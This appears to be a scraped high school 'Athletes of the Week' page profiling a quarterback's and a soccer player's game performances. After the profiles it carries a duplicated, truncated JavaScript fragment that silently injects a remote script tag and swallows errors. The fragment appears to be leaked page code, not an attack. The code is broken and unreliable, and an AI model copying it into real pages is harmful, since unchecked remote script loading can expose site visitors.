Athletes of the Week

Kemba Credit Union Athletes of the Week 8/31/2020-9/6/2020

Mitch Bolden
Sophomore, Football

Mitch threw for 139 yds connecting for 3 touchdowns. He also ran for 53 yds with 1 rushing touchdown beating Hamilton Big Blue 40-13.

 

 

 

 

 

 

Kailyn Dudukovich
Senior, Girls Soccer

Kailyn scores 3 goals against the Firebirds crosstown rival Lakota East beating them 5-1.

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts